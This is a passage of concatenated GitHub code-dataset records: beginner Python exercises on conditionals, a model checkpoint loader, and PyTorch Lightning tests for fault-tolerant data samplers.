B\")\n# else:\n# print(\"Your Grade is: C\")\n\n\n\n\n\n#<----------------------------NESTED IF-ELSE------------------------------>\n\n#Ques 6: find greatst of three numbers using nested if else\n\n\n\n\n# n1 = int(input(\"Enter the first Number:\"))\n# n2 = int(input(\"Enter the second Number:\"))\n# n3 = int(input(\"Enter the Third Number:\"))\n\n# if n1>n2:\n# if n1>n3:\n# print(n1, \"is the greatest Number\")\n# else:\n# print(n3, \"is the greatest Number\")\n# else:\n# if(n2>n3):\n# print(n2, \"is the greatest Number\")\n# else:\n# print(n3, \"is the greatest element\")\n\n\n\n \n#<----------------------------MATCH CASE (Python 3.10)------------------------------>\n#Calculator using Match Statement\n\n\n# num1 = int(input(\"Enter Number1:\"))\n# num2 = int(input(\"Enter Number2:\"))\n\n# operator = input(\"Enter Operator:\")\n\n# match operator:\n# case \"+\":\n# print(\"Sum is:\", num1 + num2)\n# case \"-\":\n# print(\"Difference is:\", num1-num2)\n# case \"*\":\n# print(\"Product is:\", num1*num2)\n# case \"/\":\n# print(\"Division is:\", num1/num2)\n# case \"//\":\n# print(\"Divison Roundoff is:\", num1//num2)\n# case \"%\":\n# print(\"Remiender is:\", num1%num2)\n# case \"**\":\n# print(\"num1 to the power num2 is:\", num1**num2)\n# case _ :\n# print(\"Enter a valid operator\")\n\n\n\n\n#<----------------------------TERNARY OPERATOR------------------------------>\n\n#Ques 7: Write a program to check if number is odd or even using ternary operator\n\nnum = int (input(\"Enter a number:\"))\n\noutput = \"Even\" if num%2 ==0 else \"Odd\"\n\n#we can use direct in print\nprint(\"Output is\", output )\n\n\n","repo_name":"JayrajPratapSingh/PYTHON-LEARNING","sub_path":"10_Conditionals.py","file_name":"10_Conditionals.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17062071591","text":"#Print sum of all numbers within given range\r\n\r\nnum1 = int(input(\"Enter the Starting value : \"))\r\nnum2 = int(input(\"Enter the Ending value : \"))\r\ntotal = 0\r\n\r\nif num1 > num2:\r\n print(\"Starting number cannot be greater\")\r\n exit()\r\nelse:\r\n for i in range(num1 , num2+1):\r\n total= total + i\r\n \r\nprint(\"The sum of range({0},{1}) is {2}\".format(num1,num2,total)) \r\n","repo_name":"nareshkr22/gtu_python","sub_path":"sum_all.py","file_name":"sum_all.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29847641590","text":"import random\ndef main2():\n #print(\"Keep it logically awesome.\")\n\n f = open(\"quotes.txt\")\n quotes = f.readlines()\n \n last = 13\n rnd = random.randint(0,last)\n lstrip = quotes[rnd].strip()\n print(quotes[0])\n f.close()\n f = open(\"quotes.txt\", 'a')\n inp = \"Please enter \"\n print(inp)\n f.write(inp)\n f.close()\nif __name__== \"__main__\":\n main2()\n","repo_name":"abhishekdec1994/python-random-quote","sub_path":"get-quote.py","file_name":"get-quote.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11307201191","text":"import torch\nfrom torch import nn\nfrom functools import reduce\nfrom pathlib import Path\n\nfrom super_resolution.configs import SuperresConfig, ElucidatedSuperresConfig\nfrom ema_pytorch import EMA\n\ndef exists(val):\n return val is not None\n\ndef safeget(dictionary, keys, default = None):\n return reduce(lambda d, key: d.get(key, default) if isinstance(d, dict) else default, keys.split('.'), dictionary)\n\ndef load_superres_from_checkpoint(\n checkpoint_path,\n load_weights = True,\n load_ema_if_available = False\n):\n model_path = Path(checkpoint_path)\n full_model_path = str(model_path.resolve())\n assert model_path.exists(), f'checkpoint not found at {full_model_path}'\n loaded = torch.load(str(model_path), map_location='cpu')\n\n superres_params = safeget(loaded, 'superres_params')\n superres_type = safeget(loaded, 'superres_type')\n\n if superres_type == 'original':\n superres_klass = SuperresConfig\n elif superres_type == 'elucidated':\n superres_klass = ElucidatedSuperresConfig\n else:\n raise ValueError(f'unknown superres type {superres_type} - you need to instantiate your superres with configurations, using classes SuperresConfig or ElucidatedSuperresConfig')\n\n assert exists(superres_params) and exists(superres_type), 'superres type and configuration not saved in this checkpoint'\n\n superres = superres_klass(**superres_params).create()\n\n if not load_weights:\n return superres\n\n has_ema = 'ema' in loaded\n should_load_ema = has_ema and load_ema_if_available\n\n superres.load_state_dict(loaded['model'])\n\n if not should_load_ema:\n print('loading non-EMA version of unets')\n return superres\n\n ema_unets = nn.ModuleList([])\n for unet in superres.unets:\n ema_unets.append(EMA(unet))\n\n ema_unets.load_state_dict(loaded['ema'])\n\n for unet, ema_unet in zip(superres.unets, ema_unets):\n unet.load_state_dict(ema_unet.ema_model.state_dict())\n\n print('loaded EMA version of unets')\n return superres\n","repo_name":"ibrahimethemhamamci/GenerateCT","sub_path":"super_resolution/super_resolution/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"54"} +{"seq_id":"73952722402","text":"import math\nimport os\nimport random\nimport random as python_random\nfrom collections import defaultdict\nfrom collections.abc import Iterable\nfrom contextlib import suppress\nfrom copy import deepcopy\nfrom typing import List, Optional\nfrom unittest import mock\nfrom unittest.mock import ANY\n\nimport numpy as np\nimport pytest\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch.utils.data import BatchSampler, DistributedSampler, RandomSampler, SequentialSampler\nfrom torch.utils.data._utils.worker import get_worker_info\nfrom torch.utils.data.dataloader import DataLoader, default_collate\nfrom torch.utils.data.dataset import Dataset, IterableDataset\n\nimport tests.helpers.utils as tutils\nfrom pytorch_lightning import Callback, LightningModule, seed_everything, Trainer\nfrom pytorch_lightning.utilities.auto_restart import (\n _add_capture_metadata_collate,\n _dataloader_load_state_dict,\n _dataloader_to_state_dict,\n CaptureIterableDataset,\n CaptureMapDataset,\n FastForwardSampler,\n MergedIteratorState,\n)\nfrom pytorch_lightning.utilities.enums import AutoRestartBatchKeys\nfrom pytorch_lightning.utilities.exceptions import ExitGracefullyException, MisconfigurationException\nfrom pytorch_lightning.utilities.fetching import DataFetcher\nfrom pytorch_lightning.utilities.imports import _fault_tolerant_training\nfrom tests.helpers.boring_model import BoringModel, RandomDataset\nfrom tests.helpers.runif import RunIf\n\n\n# Credit to PyTorch Team.\n# Taken from:\n# https://github.com/pytorch/pytorch/blob/3b977a0d2834d300c0301a0c6af98c8e939019ce/torch/utils/data/_utils/worker.py#L151\n# Not available until torch 1.9.0\ndef _generate_state(base_seed, worker_id):\n INIT_A = 0x43B0D7E5\n MULT_A = 0x931E8875\n INIT_B = 0x8B51F9DD\n MULT_B = 0x58F38DED\n MIX_MULT_L = 0xCA01F9DD\n MIX_MULT_R = 0x4973F715\n XSHIFT = 4 * 8 // 2\n MASK32 = 0xFFFFFFFF\n\n entropy = [worker_id, base_seed & MASK32, base_seed >> 32, 0]\n pool = [0] * 4\n\n hash_const_A = INIT_A\n\n def hash(value):\n nonlocal hash_const_A\n value = (value ^ hash_const_A) & MASK32\n hash_const_A = (hash_const_A * MULT_A) & MASK32\n value = (value * hash_const_A) & MASK32\n value = (value ^ (value >> XSHIFT)) & MASK32\n return value\n\n def mix(x, y):\n result_x = (MIX_MULT_L * x) & MASK32\n result_y = (MIX_MULT_R * y) & MASK32\n result = (result_x - result_y) & MASK32\n result = (result ^ (result >> XSHIFT)) & MASK32\n return result\n\n # Add in the entropy to the pool.\n for i in range(len(pool)):\n pool[i] = hash(entropy[i])\n\n # Mix all bits together so late bits can affect earlier bits.\n for i_src in range(len(pool)):\n for i_dst in range(len(pool)):\n if i_src != i_dst:\n pool[i_dst] = mix(pool[i_dst], hash(pool[i_src]))\n\n hash_const_B = INIT_B\n state = []\n for i_dst in range(4):\n data_val = pool[i_dst]\n data_val = (data_val ^ hash_const_B) & MASK32\n hash_const_B = (hash_const_B * MULT_B) & MASK32\n data_val = (data_val * hash_const_B) & MASK32\n data_val = (data_val ^ (data_val >> XSHIFT)) & MASK32\n state.append(data_val)\n return state\n\n\ndef test_fast_forward_getattr():\n dataset = range(15)\n sampler = SequentialSampler(dataset)\n batch_sampler = BatchSampler(sampler, 3, False)\n index_batch_sampler = FastForwardSampler(batch_sampler)\n\n assert index_batch_sampler.batch_size == 3\n assert index_batch_sampler.sampler == sampler\n\n\ndef test_fast_forward_on_batch_sampler():\n \"\"\"This test ensures ``FastForwardSampler`` applied to ``BatchSampler`` correctly retrived the right next batch\n on restart.\"\"\"\n dataset = range(15)\n sampler = SequentialSampler(dataset)\n batch_sampler = BatchSampler(sampler, 3, False)\n index_batch_sampler = FastForwardSampler(batch_sampler)\n\n assert isinstance(index_batch_sampler, Iterable)\n\n index_batch_sampler_iter = iter(index_batch_sampler)\n\n assert next(index_batch_sampler_iter) == [0, 1, 2]\n assert next(index_batch_sampler_iter) == [3, 4, 5]\n\n state_dict = index_batch_sampler.state_dict(2)\n\n index_batch_sampler = FastForwardSampler(batch_sampler)\n index_batch_sampler.load_state_dict(state_dict)\n\n index_batch_sampler_iter = iter(index_batch_sampler)\n assert next(index_batch_sampler_iter) == [6, 7, 8]\n\n\ndef test_fast_forward_on_sequential_sampler():\n \"\"\"This test ensures ``FastForwardSampler`` applied to ``SequentialSampler`` correctly retrived the right next\n batch on restart.\"\"\"\n dataset = range(15)\n sequential_sampler = SequentialSampler(dataset)\n sampler = FastForwardSampler(sequential_sampler)\n sampler.setup(3)\n batch_sampler = BatchSampler(sampler, 3, False)\n\n batch_sampler_iter = iter(batch_sampler)\n\n assert next(batch_sampler_iter) == [0, 1, 2]\n assert next(batch_sampler_iter) == [3, 4, 5]\n\n state_dict = sampler.state_dict(2)\n assert state_dict[0][\"current_iteration\"] == 6\n\n sampler.load_state_dict(state_dict)\n\n batch_sampler_iter = iter(batch_sampler)\n assert next(batch_sampler_iter) == [6, 7, 8]\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"todo (tchaton) Need more investigation\")\ndef test_fast_forward_on_random_sampler():\n \"\"\"This test ensures ``FastForwardSampler`` applied to ``RandomSampler`` correctly retrived the right next\n batch on restart.\"\"\"\n seed = 42\n seed_everything(42)\n\n dataset = range(15)\n generator = torch.Generator().manual_seed(seed)\n values = list(RandomSampler(dataset, generator=generator))\n\n generator = torch.Generator().manual_seed(seed)\n random_sampler = RandomSampler(dataset, generator=generator)\n sampler = FastForwardSampler(random_sampler)\n sampler.setup(3)\n batch_sampler = BatchSampler(sampler, 3, False)\n\n batch_sampler_iter = iter(batch_sampler)\n\n assert next(batch_sampler_iter) == values[:3]\n assert next(batch_sampler_iter) == values[3:6]\n assert next(batch_sampler_iter) == values[6:9]\n\n state_dict = sampler.state_dict(3)\n assert state_dict[0][\"current_iteration\"] == 9\n state_dict[0][\"current_iteration\"] = 6\n\n seed_everything(42)\n generator = torch.Generator().manual_seed(seed)\n random_sampler = RandomSampler(dataset, generator=generator)\n sampler = FastForwardSampler(random_sampler)\n sampler.setup(3)\n batch_sampler = BatchSampler(sampler, 3, False)\n sampler.load_state_dict(state_dict)\n\n batch_sampler_iter = iter(batch_sampler)\n assert next(batch_sampler_iter) == values[6:9]\n has_raised = False\n try:\n for _ in range(5):\n next(batch_sampler_iter)\n except StopIteration:\n has_raised = True\n assert sampler._current_iteration == 0\n sampler.load_state_dict(sampler.state_dict(0))\n assert has_raised\n\n\nclass RangeIterableDataset(IterableDataset):\n def __init__(self, data, num_workers: int, batch_size: int, state_dict=None, attr_name: str = \"iter_sampler\"):\n self.data = list(data)\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.state_dict = state_dict\n self.attr_name = attr_name\n\n def __iter__(self):\n worker_info = get_worker_info()\n if worker_info and self.num_workers == 2:\n id = worker_info.id\n num_samples = len(self.data)\n if id == 0:\n self.data = list(self.data)[: num_samples // 2]\n else:\n self.data = list(self.data)[num_samples // 2 :]\n self.user_sampler = RandomSampler(self.data)\n else:\n self.user_sampler = RandomSampler(self.data)\n\n setattr(self, self.attr_name, iter(self.user_sampler))\n return self\n\n def __next__(self):\n iter_sampler = getattr(self, self.attr_name)\n return self.data[next(iter_sampler)]\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"This test takes around 30 sec and should be skipped in Azure CI\")\n@pytest.mark.parametrize(\"num_workers\", [0, 1, 2])\ndef test_fast_forward_sampler_over_iterable_dataset(num_workers):\n \"\"\"This test ensures ``FastForwardSampler`` and ``CaptureIterableDataset`` are properly being used to capture\n workers states.\"\"\"\n batch_size = 3\n initial_seed = seed_everything(42)\n generator = torch.Generator()\n generator.manual_seed(initial_seed)\n dataset = RangeIterableDataset(range(20), num_workers, batch_size, True)\n dataset = CaptureIterableDataset(dataset)\n\n dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=generator)\n _add_capture_metadata_collate(dataloader)\n\n iter_dataloader = iter(dataloader)\n batches = []\n for _ in range(5):\n batches.append(next(iter_dataloader))\n\n # restarting on batch_1 and getting 3 extra batches\n\n state_dict = {\"iter_sampler\": {}}\n for batch in batches[:2]:\n batch, _state_dict = batch[\"data\"], batch[AutoRestartBatchKeys.PL_RESTART_META]\n for k, v in _state_dict.items():\n state_dict[k].update(v)\n\n assert len(state_dict[\"iter_sampler\"]) == (num_workers if num_workers > 1 else 1)\n\n initial_seed = seed_everything(42)\n generator.manual_seed(initial_seed)\n dataset = RangeIterableDataset(range(20), num_workers, batch_size, state_dict=state_dict)\n dataset = CaptureIterableDataset(dataset)\n dataset.load_state_dict(state_dict)\n dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=generator)\n _add_capture_metadata_collate(dataloader)\n\n iter_dataloader = iter(dataloader)\n batches_restart = []\n for _ in range(3):\n batches_restart.append(next(iter_dataloader))\n\n assert torch.equal(batches_restart[0][\"data\"], batches[2][\"data\"])\n assert torch.equal(batches_restart[1][\"data\"], batches[3][\"data\"])\n assert torch.equal(batches_restart[2][\"data\"], batches[4][\"data\"])\n\n\ndef _setup_ddp(rank, worldsize):\n os.environ[\"MASTER_ADDR\"] = \"localhost\"\n\n # initialize the process group\n dist.init_process_group(\"gloo\", rank=rank, world_size=worldsize)\n\n\ndef _test_fast_forward_sampler_with_distributed_sampler(rank, worldsize):\n _setup_ddp(rank, worldsize)\n\n initial_seed = seed_everything(42)\n\n generator = torch.Generator()\n generator.manual_seed(initial_seed)\n\n num_workers = 2\n batch_size = 4\n\n dataset = range(30)\n sampler = FastForwardSampler(DistributedSampler(dataset, num_replicas=worldsize, rank=rank, seed=initial_seed))\n sampler.setup(batch_size)\n dataloader = DataLoader(\n dataset, batch_size=batch_size, num_workers=num_workers, generator=generator, sampler=sampler\n )\n\n iter_dataloader = iter(dataloader)\n\n num_yielded = 0\n batches = []\n while True:\n try:\n batches.append(next(iter_dataloader))\n num_yielded += 1\n except StopIteration:\n break\n\n expected = torch.tensor([17, 27, 24]) if rank == 0 else torch.tensor([19, 5, 3])\n assert torch.equal(batches[-1], expected)\n\n assert sampler.state_dict(num_yielded)[0][\"current_iteration\"] == 16\n\n reload_state_dict = sampler.state_dict(num_yielded - 1)\n assert reload_state_dict[0][\"current_iteration\"] == 12\n\n sampler = FastForwardSampler(DistributedSampler(dataset, num_replicas=worldsize, rank=rank, seed=initial_seed))\n sampler.setup(batch_size)\n sampler.load_state_dict(reload_state_dict)\n dataloader = DataLoader(\n dataset, batch_size=batch_size, num_workers=num_workers, generator=generator, sampler=sampler\n )\n\n iter_dataloader = iter(dataloader)\n\n batches = []\n while True:\n try:\n batches.append(next(iter_dataloader))\n except StopIteration:\n break\n\n assert torch.equal(batches[-1], expected)\n assert sampler.state_dict(num_yielded)[0][\"current_iteration\"] == 16\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"This test takes around 25 sec and should be skipped in Azure CI\")\n@RunIf(skip_windows=True)\ndef test_fast_forward_sampler_with_distributed_sampler():\n \"\"\"Make sure result logging works with DDP.\"\"\"\n tutils.set_random_main_port()\n worldsize = 2\n mp.spawn(_test_fast_forward_sampler_with_distributed_sampler, args=(worldsize,), nprocs=worldsize)\n\n\nclass MetaLearningDataset(IterableDataset):\n def __init__(\n self,\n dataset: Dataset,\n batch_size: int,\n drop_last: bool,\n task_num_classes: int = 5,\n num_workers: Optional[int] = None,\n global_rank: Optional[int] = None,\n world_size: Optional[int] = None,\n initial_seed: Optional[int] = None,\n shuffle: bool = True,\n debugging: bool = False,\n ):\n self.dataset = dataset\n self.batch_size = batch_size\n self.drop_last = drop_last\n self.num_workers = num_workers or 1\n self.global_rank = global_rank\n self.world_size = world_size\n self.task_num_classes = task_num_classes\n self.labels = labels = getattr(dataset, \"labels\")\n self.initial_seed = initial_seed\n self.generator: Optional[torch.Generator] = None\n self.current_task_iteration = 0\n self.shuffle = shuffle\n self.debugging = debugging\n\n if labels is None:\n raise MisconfigurationException(f\"Provided {self.dataset} should have an attribute labels.\")\n\n if len(labels) != len(dataset):\n raise MisconfigurationException(\"Found provided ``labels`` don't match the dataset length.\")\n\n if (isinstance(global_rank, int) and world_size is None) or (\n isinstance(world_size, int) and global_rank is None\n ):\n raise MisconfigurationException(\"Both ``world_size`` and ``global_rank`` should be provided !\")\n\n self.unique_labels = np.unique(self.labels)\n\n @property\n def worker_id(self) -> int:\n worker_info = get_worker_info()\n return worker_info.id if worker_info else 0\n\n @property\n def is_distributed(self) -> bool:\n return self.world_size is not None and self.world_size > 1\n\n def set_seed(self, shared: bool = False):\n initial_seed = self.initial_seed + self.current_task_iteration\n if shared:\n seed = initial_seed\n np_seed = _generate_state(initial_seed, 0)\n else:\n seed = initial_seed + self.worker_id + self.global_rank + self.current_task_iteration\n np_seed = _generate_state(initial_seed, self.worker_id + self.global_rank)\n\n random.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(np_seed)\n\n def sample_task_indices(self):\n self.set_seed(shared=True)\n self.selected_indexes = np.random.choice(self.unique_labels, self.task_num_classes, replace=False)\n self.selected_indexes.sort()\n\n # subset of indices from the entire dataset where the labels are actually among the\n # task_num_classes selected_indexes\n\n self.task_indices = np.arange(len(self.dataset))[np.in1d(self.labels, self.selected_indexes)]\n self.task_length = len(self.task_indices)\n self.set_seed(shared=False)\n\n @property\n def worker_rank(self) -> int:\n worker_id = self.worker_id\n is_global_zero = self.global_rank == 0\n return self.global_rank + worker_id + int(not is_global_zero)\n\n def create_sampler(self):\n data = range(self.task_length)\n if self.world_size == 1 and self.num_workers in (0, 1):\n if self.shuffle:\n self.sampler = RandomSampler(data, generator=self.generator)\n else:\n self.sampler = SequentialSampler(data)\n else:\n num_workers = 1 if self.num_workers in (None, 0) else self.num_workers\n num_replicas = num_workers * self.world_size\n current_seed = self.initial_seed + self.current_task_iteration\n self.sampler = DistributedSampler(\n data, num_replicas=num_replicas, rank=self.worker_rank, shuffle=self.shuffle, seed=current_seed\n )\n\n def __iter__(self):\n if self.generator is None:\n self.generator = torch.Generator().manual_seed(self.initial_seed)\n self.sample_task_indices()\n self.create_sampler()\n self.batch_sampler = BatchSampler(self.sampler, batch_size=self.batch_size, drop_last=self.drop_last)\n self.iter_sampler = iter(self.batch_sampler)\n self.is_first_batch = True\n self.current_task_iteration += 1\n return self\n\n def increment_iteration(self):\n self.current_task_iteration += 1\n\n def __next__(self):\n # this is optional, but useful to accumulate gradient over the entire task.\n is_first_batch = self.is_first_batch if self.debugging else (self.is_first_batch and self.worker_id == 0)\n if is_first_batch:\n self.is_first_batch = False\n return {\"task_length\": len(self.batch_sampler), \"selected_indexes\": self.selected_indexes}\n\n random_indices = next(self.iter_sampler)\n task_indices = [self.task_indices[idx] for idx in random_indices]\n return default_collate([self.dataset[idx] for idx in task_indices])\n\n\nclass ClassificationDataset(Dataset):\n def __init__(self, inputs, labels):\n self.inputs = inputs\n self.labels = labels\n assert len(self.inputs) == len(self.labels)\n\n def __getitem__(self, index):\n return (self.inputs[index], self.labels[index])\n\n def __len__(self):\n return len(self.inputs)\n\n\ndef _test_fast_forward_sampler_with_distributed_sampler_and_iterative_dataset(rank, worldsize):\n if worldsize > 1:\n _setup_ddp(rank, worldsize)\n\n def all_gather(tensor, world_size):\n tensor_list = [torch.zeros_like(tensor, dtype=torch.int64) for _ in range(world_size)]\n torch.distributed.all_gather(tensor_list, tensor)\n return tensor_list\n\n initial_seed = seed_everything(42)\n\n generator = torch.Generator()\n generator.manual_seed(initial_seed)\n\n num_workers = 2\n batch_size = 4\n dataset_length = 60\n num_classes = 10\n\n labels = np.random.randint(0, num_classes, dataset_length)\n\n dataset = ClassificationDataset(range(dataset_length), labels)\n dataset = MetaLearningDataset(\n dataset,\n batch_size=batch_size,\n drop_last=True,\n num_workers=num_workers,\n global_rank=rank,\n world_size=worldsize,\n initial_seed=initial_seed,\n debugging=True,\n shuffle=True,\n )\n dataset = CaptureIterableDataset(dataset)\n dataloader = DataLoader(dataset, num_workers=num_workers, batch_size=1, generator=generator)\n _add_capture_metadata_collate(dataloader)\n\n epoch_results = []\n for _ in range(2):\n iter_dataloader = iter(dataloader)\n batches = []\n while True:\n try:\n batches.append(next(iter_dataloader))\n except StopIteration:\n break\n epoch_results.append(batches)\n dataloader.dataset.dataset.current_task_iteration += 1\n\n assert len(epoch_results) == 2\n\n assert len(epoch_results[0]) == math.ceil((dataset_length / (num_workers * worldsize)) / batch_size) + 2\n\n if worldsize == 1:\n assert epoch_results[0][0][\"data\"][\"task_length\"] == epoch_results[0][1][\"data\"][\"task_length\"]\n assert torch.equal(\n epoch_results[0][0][\"data\"][\"selected_indexes\"], epoch_results[0][1][\"data\"][\"selected_indexes\"]\n )\n assert 0 in epoch_results[0][2][AutoRestartBatchKeys.PL_RESTART_META][\"iter_sampler\"] # worker id 0\n assert 1 in epoch_results[0][3][AutoRestartBatchKeys.PL_RESTART_META][\"iter_sampler\"] # worker id 1\n assert not torch.equal(epoch_results[0][2][\"data\"][0], epoch_results[0][3][\"data\"][0])\n else:\n first_task_metadata = all_gather(epoch_results[0][0][\"data\"][\"task_length\"], worldsize)\n second_task_metadata = all_gather(epoch_results[0][1][\"data\"][\"task_length\"], worldsize)\n assert torch.equal(first_task_metadata[0], first_task_metadata[1])\n assert torch.equal(second_task_metadata[0], second_task_metadata[1])\n assert torch.equal(first_task_metadata[0], second_task_metadata[1])\n\n first_batch_list = all_gather(epoch_results[0][2][\"data\"][0], worldsize)\n assert not torch.equal(first_batch_list[0], first_batch_list[1])\n second_batch_list = all_gather(epoch_results[0][3][\"data\"][0], worldsize)\n assert not torch.equal(second_batch_list[0], second_batch_list[1])\n\n # restarting on epoch 0 / real batch 2\n state_dict = {\"iter_sampler\": {}}\n for batch in epoch_results[0][2:4]:\n batch, _state_dict = batch[\"data\"], batch[AutoRestartBatchKeys.PL_RESTART_META]\n for k, v in _state_dict.items():\n state_dict[k].update(v)\n\n dataset = ClassificationDataset(range(dataset_length), labels)\n dataset = MetaLearningDataset(\n dataset,\n batch_size=batch_size,\n drop_last=True,\n num_workers=num_workers,\n global_rank=rank,\n world_size=worldsize,\n initial_seed=initial_seed,\n debugging=True,\n shuffle=True,\n )\n\n dataset = CaptureIterableDataset(dataset)\n dataset.load_state_dict(state_dict)\n dataloader = DataLoader(dataset, num_workers=num_workers, batch_size=1, generator=generator)\n _add_capture_metadata_collate(dataloader)\n\n epoch_results_restart = []\n for _ in range(2):\n iter_dataloader = iter(dataloader)\n batches = []\n while True:\n try:\n batches.append(next(iter_dataloader))\n except StopIteration:\n break\n epoch_results_restart.append(batches)\n dataloader.dataset.dataset.increment_iteration()\n dataloader.dataset.reset_on_epoch()\n\n assert len(epoch_results_restart[0]) + 2 == len(epoch_results[0])\n epoch_tensors = [e[\"data\"][0] for e in epoch_results[0][4:]]\n epoch_tensors_restart = [e[\"data\"][0] for e in epoch_results_restart[0][2:]]\n\n for t, tr in zip(epoch_tensors, epoch_tensors_restart):\n assert torch.equal(t, tr)\n\n epoch_tensors = [e[\"data\"][0] for e in epoch_results[1][2:]]\n epoch_tensors_restart = [e[\"data\"][0] for e in epoch_results_restart[1][2:]]\n\n for t, tr in zip(epoch_tensors, epoch_tensors_restart):\n assert torch.equal(t, tr)\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"This test takes around 45 sec and should be skipped in Azure CI\")\ndef test_fast_forward_sampler_iterative_dataset():\n _test_fast_forward_sampler_with_distributed_sampler_and_iterative_dataset(0, 1)\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"This test takes around 55 sec and should be skipped in Azure CI\")\n@RunIf(skip_windows=True)\ndef test_fast_forward_sampler_with_distributed_sampler_and_iterative_dataset():\n \"\"\"Make sure result logging works with DDP.\"\"\"\n tutils.set_random_main_port()\n worldsize = 2\n mp.spawn(\n _test_fast_forward_sampler_with_distributed_sampler_and_iterative_dataset, args=(worldsize,), nprocs=worldsize\n )\n\n\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(max_torch=\"1.7\")\ndef test_fault_tolerant_not_supported():\n assert not _fault_tolerant_training()\n\n\ndef create_iterable_dataset(batch_size, num_workers, attr_name=\"iter_sampler\", wrap: bool = True):\n dataset = RangeIterableDataset(range(50), num_workers=num_workers, batch_size=batch_size, attr_name=attr_name)\n if wrap:\n dataset = CaptureIterableDataset(dataset)\n return dataset\n\n\ndef test_dataloader_to_state_dict_and_reload():\n \"\"\"\n Note: Those utilities are used only with DataLoader wrapping a ``mapping`` based dataset.\n \"\"\"\n\n def create_dataloader():\n dataset = range(50)\n batch_size = 8\n sampler = FastForwardSampler(SequentialSampler(dataset))\n sampler.setup(batch_size)\n\n return DataLoader(dataset, sampler=sampler, batch_size=batch_size)\n\n dataloader = create_dataloader()\n iter_dataloader = iter(dataloader)\n _ = next(iter_dataloader)\n _ = next(iter_dataloader)\n\n state_dict = _dataloader_to_state_dict(dataloader, iter_dataloader)\n assert state_dict == {\n \"num_workers\": 0,\n \"previous_worker\": None,\n 0: {\"current_iteration\": 16},\n }\n\n dataloader = create_dataloader()\n dataloader = _dataloader_load_state_dict(dataloader, state_dict)\n iter_dataloader = iter(dataloader)\n _ = next(iter_dataloader)\n\n state_dict = _dataloader_to_state_dict(dataloader, iter_dataloader)\n assert state_dict == {\n \"num_workers\": 0,\n \"previous_worker\": None,\n 0: {\"current_iteration\": 24},\n }\n\n\n@RunIf(min_torch=\"1.7.0\")\n@pytest.mark.parametrize(\"use_fault_tolerant\", [\"0\", \"1\"])\ndef test_data_loading_wraps_dataset_and_samplers(use_fault_tolerant, tmpdir):\n \"\"\"This test ensures the dataset and sampler are properly wrapped when fault tolerant is enabled.\"\"\"\n\n class CustomBatchSampler(BatchSampler):\n pass\n\n dataset = range(50)\n\n class TestModel(BoringModel):\n def train_dataloader(self):\n return {\n \"a\": [\n DataLoader(create_iterable_dataset(3, 1, wrap=False), num_workers=0, batch_size=3),\n DataLoader(dataset, batch_size=8),\n DataLoader(\n dataset,\n batch_sampler=CustomBatchSampler(SequentialSampler(dataset), batch_size=8, drop_last=False),\n ),\n ],\n \"b\": DataLoader(\n create_iterable_dataset(2, num_workers=1, attr_name=\"custom_sampler\", wrap=False),\n num_workers=0,\n batch_size=2,\n ),\n }\n\n def training_step(self, batch, batch_idx):\n assert batch == {\n \"a\": [ANY, ANY, ANY],\n \"b\": ANY,\n }\n\n def validation_step(self, batch, batch_idx):\n assert isinstance(batch, torch.Tensor)\n\n validation_epoch_end = None\n\n class Check(Callback):\n def on_train_batch_start(self, trainer, *_) -> None:\n loaders = trainer.train_dataloader.loaders\n if use_fault_tolerant == \"1\":\n assert isinstance(loaders[\"a\"][0].loader.dataset, CaptureIterableDataset)\n assert isinstance(loaders[\"a\"][1].loader.sampler, FastForwardSampler)\n assert isinstance(loaders[\"a\"][1].loader.dataset, CaptureMapDataset)\n assert isinstance(loaders[\"a\"][2].loader.batch_sampler, FastForwardSampler)\n assert isinstance(loaders[\"a\"][2].loader.dataset, CaptureMapDataset)\n assert isinstance(loaders[\"b\"].loader.dataset, CaptureIterableDataset)\n else:\n assert isinstance(loaders[\"a\"][0].loader.dataset, RangeIterableDataset)\n assert isinstance(loaders[\"a\"][1].loader.sampler, SequentialSampler)\n assert not isinstance(loaders[\"a\"][1].loader.dataset, CaptureMapDataset)\n assert isinstance(loaders[\"a\"][2].loader.batch_sampler, CustomBatchSampler)\n assert not isinstance(loaders[\"a\"][2].loader.dataset, CaptureMapDataset)\n assert isinstance(loaders[\"b\"].loader.dataset, RangeIterableDataset)\n\n with mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": use_fault_tolerant}):\n model = TestModel()\n model.training_epoch_end = None\n trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, limit_train_batches=1, callbacks=Check())\n trainer.fit(model)\n\n\nclass SequentialGetItemDataset(Dataset):\n def __init__(self, length, *_):\n self.len = length\n\n def __getitem__(self, index):\n return torch.tensor([index]).float()\n\n def __len__(self):\n return self.len\n\n\nclass RandomGetItemDataset(Dataset):\n \"\"\"A dataset with random elements generated using global rng from torch, numpy and python.\"\"\"\n\n def __init__(self, length, size):\n self.size = size\n self.len = length\n\n def __getitem__(self, index):\n t = torch.rand(self.size)\n n = torch.from_numpy(np.random.rand(self.size))\n p = torch.tensor([python_random.random() for _ in range(self.size)])\n sample = (index + (t + n + p) / 10).float()\n return sample\n\n def __len__(self):\n return self.len\n\n\n# TODO: test with `RandomGeneratorGetItemDataset`\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(min_torch=\"1.7.0\")\n@pytest.mark.parametrize(\n \"dataset_class\",\n [\n 